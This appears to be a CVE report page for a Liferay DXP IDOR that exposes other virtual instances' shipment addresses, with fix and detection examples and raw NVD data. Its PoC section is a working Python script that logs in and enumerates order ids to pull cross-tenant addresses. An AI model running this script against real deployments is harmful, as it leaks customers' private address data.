Security Vulnerability Report
CVE-2025-62241 CVSS 4.3 MEDIUM


Published: 2025-10-13 20:15:34
Last Modified: 2025-11-12 16:22:40

Description

Insecure Direct Object Reference (IDOR) vulnerability with shipment addresses in Liferay DXP 2023.Q4.1 through 2023.Q4.5 allows remote authenticated users from one virtual instance to view the shipment addresses of a different virtual instance via the _com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet_commerceOrderId parameter. The portlet resolves the caller-supplied order id without confirming that the order belongs to the caller's own virtual instance, so an ordinary authenticated account (no elevated privileges, hence PR:L) is enough to read address data held by another tenant on the same deployment.
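The authorization check the description implies, as an added illustration that is not Liferay's code: a lookup that trusts the caller-supplied order id beside one that re-checks the id against the caller's own virtual instance and ownership. Liferay's virtual instances are modelled here as a company_id carried by every user and order; the in-memory store, ids, names and addresses are all constructed for the example.

```python
"""The IDOR pattern behind CVE-2025-62241, shown on a toy order store.

Added illustration, not Liferay code. Liferay "virtual instances" are
modelled as a company_id carried by every user and every order; all
ids, names and addresses below are constructed for the example.
"""
from dataclasses import dataclass


class Forbidden(Exception):
    """Raised when the caller may not view the requested order."""


@dataclass(frozen=True)
class User:
    user_id: int
    company_id: int  # the virtual instance the session belongs to


@dataclass(frozen=True)
class CommerceOrder:
    order_id: int
    company_id: int  # the virtual instance that owns the order
    user_id: int     # the customer who placed it
    shipping_address: str


# Constructed data: two virtual instances (10 and 20) sharing one
# database, so order ids are globally unique and easy to guess.
ORDERS = {
    1001: CommerceOrder(1001, 10, 501, "1 Example Way, Instance A"),
    1002: CommerceOrder(1002, 20, 601, "2 Sample Street, Instance B"),
    1003: CommerceOrder(1003, 10, 502, "3 Other Road, Instance A"),
}


def view_order_vulnerable(caller: User, order_id: int) -> str:
    """Resolve the caller-supplied id by primary key and return the
    address. Authentication is the only gate, so any logged-in user can
    read any order on the deployment, whatever instance owns it."""
    order = ORDERS.get(order_id)
    if order is None:
        raise KeyError(order_id)
    return order.shipping_address


def view_order_fixed(caller: User, order_id: int) -> str:
    """Scope the lookup to the caller's instance, then check ownership.

    Both checks matter: the instance check closes the cross-tenant read
    the CVE describes; the ownership check closes the same-tenant IDOR
    that would otherwise remain.
    """
    order = ORDERS.get(order_id)
    # Treat "no such order" and "order in another instance" identically so
    # the response does not reveal which ids exist in other instances.
    if order is None or order.company_id != caller.company_id:
        raise Forbidden(f"order {order_id} not visible in instance {caller.company_id}")
    if order.user_id != caller.user_id:
        raise Forbidden(f"order {order_id} belongs to another customer")
    return order.shipping_address


def _attempt(fn, caller: User, order_id: int) -> str:
    """Run one lookup and report the outcome instead of raising."""
    try:
        return fn(caller, order_id)
    except (Forbidden, KeyError):
        return "forbidden"


def demo() -> dict:
    """A user from instance 10 reads an order from instance 20, a
    colleague's order in instance 10, and their own order."""
    attacker = User(user_id=501, company_id=10)
    return {
        "vulnerable_cross_instance": _attempt(view_order_vulnerable, attacker, 1002),
        "fixed_cross_instance": _attempt(view_order_fixed, attacker, 1002),
        "fixed_same_instance_other_user": _attempt(view_order_fixed, attacker, 1003),
        "fixed_own_order": _attempt(view_order_fixed, attacker, 1001),
    }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case}: {outcome}")
```

The point of the fixed version is where the instance id comes from: it is taken from the authenticated session, never from a request parameter, and the object is compared against it before any data leaves the handler. Returning the same error for "missing" and "belongs to another instance" also keeps the endpoint from doubling as an oracle for which ids exist elsewhere.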

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CVSS 4.0 Vector (secondary score, base 5.3 MEDIUM)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness
CWE-639 (Authorization Bypass Through User-Controlled Key)

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:2023.q4.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q4.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q4.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q4.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q4.5:*:*:*:*:*:*:* - VULNERABLE
Liferay DXP 2023.Q4.1
Liferay DXP 2023.Q4.2
Liferay DXP 2023.Q4.3
Liferay DXP 2023.Q4.4
Liferay DXP 2023.Q4.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62241 PoC - Liferay DXP Commerce Order IDOR
# Exploits missing virtual instance validation in CommerceOrderPortlet
import requests

TARGET_HOST = "https://target-liferay-instance.com"
AUTH_USER = "attacker_user"
AUTH_PASS = "attacker_password"

# Step 1: Authenticate to obtain session cookie.
# Caveat: the login endpoint and form fields below are the PoC's assumptions;
# they are not confirmed by the advisory and vary between Liferay versions.
# Confirm the session is actually logged in before trusting the results.
session = requests.Session()
login_url = f"{TARGET_HOST}/c/portal/login"
login_payload = {
    "_com_liferay_login_web_portlet_LoginPortlet_formDate": "",
    "_com_liferay_login_web_portlet_LoginPortlet_saveLastPath": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_redirect": "",
    "_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_login": AUTH_USER,
    "_com_liferay_login_web_portlet_LoginPortlet_password": AUTH_PASS,
}
login_response = session.post(login_url, data=login_payload)
login_response.raise_for_status()

# Step 2: Exploit IDOR by manipulating the commerceOrderId parameter.
# The vulnerable parameter allows accessing shipment addresses
# from a different virtual instance.
vuln_endpoint = (
    f"{TARGET_HOST}/group/guest/~/control_panel/manage"
    "?p_p_id=com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet"
)
PORTLET_NS = "_com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet_"

# Enumerate order IDs; ids are global across virtual instances, so ids
# belonging to other instances are reachable from this session.
for order_id in range(1, 100):
    params = {
        "p_p_lifecycle": "0",
        PORTLET_NS + "commerceOrderId": str(order_id),
        PORTLET_NS + "mvcRenderCommandName": "/commerce_order/view_commerce_order",
    }
    response = session.get(vuln_endpoint, params=params)
    # A substring match on "shipment" is a coarse success test; a page that
    # mentions shipments without rendering an address also matches.
    if response.status_code == 200 and "shipment" in response.text.lower():
        print(f"[+] Order ID {order_id} - Shipment address found:")
        # The address is printed as part of the raw page; extract it as needed
        print(response.text)
        break

# Note: Successful exploitation returns shipment addresses
# belonging to a different virtual instance than the attacker's.
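A detection the enumeration loop above suggests, as an added example that is not part of the advisory: scan web-server access logs for a single client walking through many distinct commerceOrderId values in a short window. The log lines are constructed (Apache combined format); the request path and parameter name follow the PoC; the threshold and window size are assumptions to tune per site.

```python
"""Flag commerceOrderId enumeration in access logs.

Added example, not part of the advisory. The log lines are constructed
(Apache combined format, with the request path and parameter name from
the PoC). A buyer looks at a few of their own orders; an enumeration
script walks through many distinct ids, which is what the sliding
window below counts. Threshold and window size are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

ORDER_ID_PARAM = (
    "_com_liferay_commerce_order_web_internal_portlet_"
    "CommerceOrderPortlet_commerceOrderId"
)
PORTLET_PATH = "/group/guest/~/control_panel/manage"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def _constructed_line(ip: str, user: str, second: int, order_id: int) -> str:
    """Build one synthetic access-log line for the sample below."""
    target = (
        f"{PORTLET_PATH}?p_p_id=com_liferay_commerce_order_web_internal_portlet_"
        f"CommerceOrderPortlet&p_p_lifecycle=0&{ORDER_ID_PARAM}={order_id}"
    )
    return (f'{ip} - {user} [13/Oct/2025:20:15:{second:02d} +0000] '
            f'"GET {target} HTTP/1.1" 200 5120')


# Constructed sample: one client walks ids 1..12 in 12 seconds, one buyer
# views two of their own orders, one unrelated page view.
SAMPLE_LOG = (
    [_constructed_line("203.0.113.5", "attacker_user", s, s + 1) for s in range(12)]
    + [
        _constructed_line("198.51.100.7", "alice", 30, 1001),
        _constructed_line("198.51.100.7", "alice", 31, 1001),
        _constructed_line("198.51.100.7", "alice", 45, 1004),
        '198.51.100.9 - - [13/Oct/2025:20:15:50 +0000] "GET /web/guest/home HTTP/1.1" 200 8192',
    ]
)


def parse_events(lines):
    """Return (ip, user, timestamp, order_id) for requests carrying the
    vulnerable parameter; other lines are ignored."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ids = parse_qs(urlsplit(m["target"]).query).get(ORDER_ID_PARAM)
        if not ids:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append((m["ip"], m["user"], ts, ids[0]))
    return events


def find_enumeration(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {(ip, user): n} for clients that requested at least
    `threshold` distinct order ids inside some span no longer than `window`."""
    by_client = defaultdict(list)
    for ip, user, ts, order_id in parse_events(lines):
        by_client[(ip, user)].append((ts, order_id))
    flagged = {}
    for client, events in by_client.items():
        events.sort()
        best = 0
        for i, (start, _) in enumerate(events):
            distinct = set()
            for ts, order_id in events[i:]:
                if ts - start > window:
                    break
                distinct.add(order_id)
            best = max(best, len(distinct))
        if best >= threshold:
            flagged[client] = best
    return flagged


if __name__ == "__main__":
    for (ip, user), n in find_enumeration(SAMPLE_LOG).items():
        print(f"[!] {ip} ({user}) requested {n} distinct commerceOrderId values")
```

Counting distinct ids rather than raw requests keeps a buyer who reloads one order page out of the alert, and keying on the authenticated user as well as the IP survives a scanner that rotates source addresses behind one login. The access log alone cannot tell which requests crossed an instance boundary, since the status is 200 either way; confirming that needs the order ids joined against the order table's owning instance.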

References

https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62241 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62241",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-13T20:15:34.107",
    "lastModified": "2025-11-12T16:22:40.010",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Insecure Direct Object Reference (IDOR) vulnerability with shipment addresses in Liferay DXP 2023.Q4.1 through 2023.Q4.5 allows remote authenticated users to from one virtual instance to view the shipment addresses of different virtual instance via the _com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet_commerceOrderId parameter."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-639"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.1:*:*:*:*:*:*:*", "matchCriteriaId": "A27A8480-7EE1-4265-9117-D6C234ACAC5F"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.2:*:*:*:*:*:*:*", "matchCriteriaId": "94425688-725E-41DC-B2D3-14F2A7163AD6"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.3:*:*:*:*:*:*:*", "matchCriteriaId": "623CA096-BDBB-4F59-B734-07FB405800CE"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.4:*:*:*:*:*:*:*", "matchCriteriaId": "30B27CBE-14BA-4EBB-8B74-91DD1228A1F5"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.5:*:*:*:*:*:*:*", "matchCriteriaId": "81EDBB1C-9EBB-4FAD-ADAC-B5A890BB3F50"}
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62241",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}